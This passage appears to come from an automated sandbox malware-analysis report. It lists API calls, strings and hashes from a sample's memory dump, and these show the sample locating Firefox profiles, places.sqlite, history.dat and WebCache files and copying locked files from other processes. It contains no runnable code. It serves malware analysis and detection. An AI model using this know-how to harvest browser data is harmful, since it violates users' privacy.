                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 3527940856-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              APIs
                                                                • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 3030842498-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$Closewcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 3249829328-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 2705122986-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotificationSleep
                                                              • String ID: }A
                                                              • API String ID: 1821831730-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@DeleteObject
                                                              • String ID: r!A
                                                              • API String ID: 1103273653-628097481
                                                              • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                              • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                              • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                              • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                              • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                              • String ID:
                                                              • API String ID: 1042154641-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 3093078384-467022611
                                                              • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
